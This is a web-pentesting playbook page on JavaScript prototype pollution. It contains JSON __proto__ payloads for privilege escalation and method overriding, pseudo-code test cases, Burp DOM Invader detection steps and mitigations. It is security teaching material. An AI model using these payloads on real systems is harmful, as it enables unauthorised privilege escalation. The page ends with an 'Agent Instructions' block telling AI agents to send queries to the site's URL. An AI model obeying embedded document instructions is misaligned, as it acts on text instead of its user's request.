# Prototype Pollution #### Description Prototype Pollution occurs when an attacker can inject properties into the prototype of an object, leading to unintended behavior or security vulnerabilities. This type of attack can affect applications that extend or manipulate JavaScript objects. #### Example with Scenario **Scenario:** A web application uses user input to create new object properties. An attacker can manipulate the input to modify the prototype of built-in objects, potentially executing arbitrary code or altering application logic. #### Payloads and Test Cases **Payloads** 1. **Adding a Property:** ```json { "__proto__": { "isAdmin": true } } ``` 2. **Modifying an Existing Property:** ```json { "__proto__": { "toString": "function() { return 'hacked'; }" } } ``` 3. **Nested Property Injection:** ```json { "__proto__": { "nested": { "polluted": "yes" } } } ``` **Test Cases** 1. **Adding a Property:** * **Payload:** ```json { "__proto__": { "isAdmin": true } } ``` * **Test Case:** ```javascript // Send payload to the server sendPayloadToServer({ "__proto__": { "isAdmin": true } }); // Verify if the application processes the injected property checkIfAdminPrivilegesGranted(); ``` 2. **Modifying an Existing Property:** * **Payload:** ```json { "__proto__": { "toString": "function() { return 'hacked'; }" } } ``` * **Test Case:** ```javascript // Send payload to the server sendPayloadToServer({ "__proto__": { "toString": "function() { return 'hacked'; }" } }); // Verify if the application uses the modified toString method checkToStringMethod("hacked"); ``` 3. **Nested Property Injection:** * **Payload:** ```json { "__proto__": { "nested": { "polluted": "yes" } } } ``` * **Test Case:** ```javascript // Send payload to the server sendPayloadToServer({ "__proto__": { "nested": { "polluted": "yes" } } }); // Verify if the application recognizes the nested polluted property checkNestedProperty("nested.polluted", "yes"); ``` #### Detection and Exploitation with DOM Invader 1. **Detection:** * Use Burp Suite's DOM Invader tool to identify vulnerable spots in the application. * Look for points where user input directly influences object properties or prototype chains. 2. **Exploitation:** * Use the identified injection points to craft malicious payloads that modify object prototypes. * Test the payloads to see if they lead to security vulnerabilities or application logic changes. #### Mitigation 1. **Input Validation:** * Validate and sanitize user input to ensure it does not contain malicious characters. * Reject input that attempts to modify object prototypes (e.g., containing `__proto__`, `constructor`, `prototype`). 2. **Use Object.create(null):** * Use `Object.create(null)` to create objects without a prototype. * Avoid extending or modifying native object prototypes. 3. **Deep Clone Objects:** * Use deep cloning techniques to prevent prototype pollution when merging objects. * Implement secure methods for object manipulation. 4. **Security Libraries:** * Use security libraries and frameworks that provide built-in protection against prototype pollution. * Enable and configure security features to prevent injection vulnerabilities. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://playbook.sidthoviti.com/web-app-pentesting/prototype-pollution.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.